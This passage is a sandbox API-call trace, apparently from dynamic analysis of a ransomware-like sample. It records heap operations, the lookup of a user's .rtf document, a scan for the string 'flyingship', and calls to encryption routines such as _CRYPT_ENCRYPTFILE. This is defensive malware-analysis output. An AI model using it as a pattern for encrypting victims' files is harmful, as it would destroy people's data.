returned 0x759a1410 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.118] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.118] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.119] CloseHandle (hObject=0x138) returned 1 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0172.119] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.119] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.120] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.120] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0172.120] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0172.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0172.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.120] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0172.120] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0172.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0172.121] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0172.121] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0172.121] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.121] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0172.121] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0172.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.121] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.121] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.121] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xfda093c0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 0x90add8 [0172.122] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.123] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xfda093c0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 0x90add8 [0172.123] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.124] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.124] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hQhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QhnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nIIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IIZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IZhAA.rtf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.126] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.126] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0172.126] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.126] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.126] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.127] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.127] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.127] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.127] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.127] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\hQhnIIZhAA.rtf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7babe0, ftCreationTime.dwHighDateTime=0x1d5e798, ftLastAccessTime.dwLowDateTime=0xfda093c0, ftLastAccessTime.dwHighDateTime=0x1d5db55, ftLastWriteTime.dwLowDateTime=0xfda093c0, ftLastWriteTime.dwHighDateTime=0x1d5db55, nFileSizeHigh=0x0, nFileSizeLow=0x1201f, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="hQhnIIZhAA.rtf", cAlternateFileName="HQHNII~1.RTF")) returned 0x90ae18 [0172.127] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0172.127] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.127] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.127] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.127] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.127] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.127] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.127] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0172.128] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.128] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0172.128] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.128] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.128] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.128] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.128] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.128] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 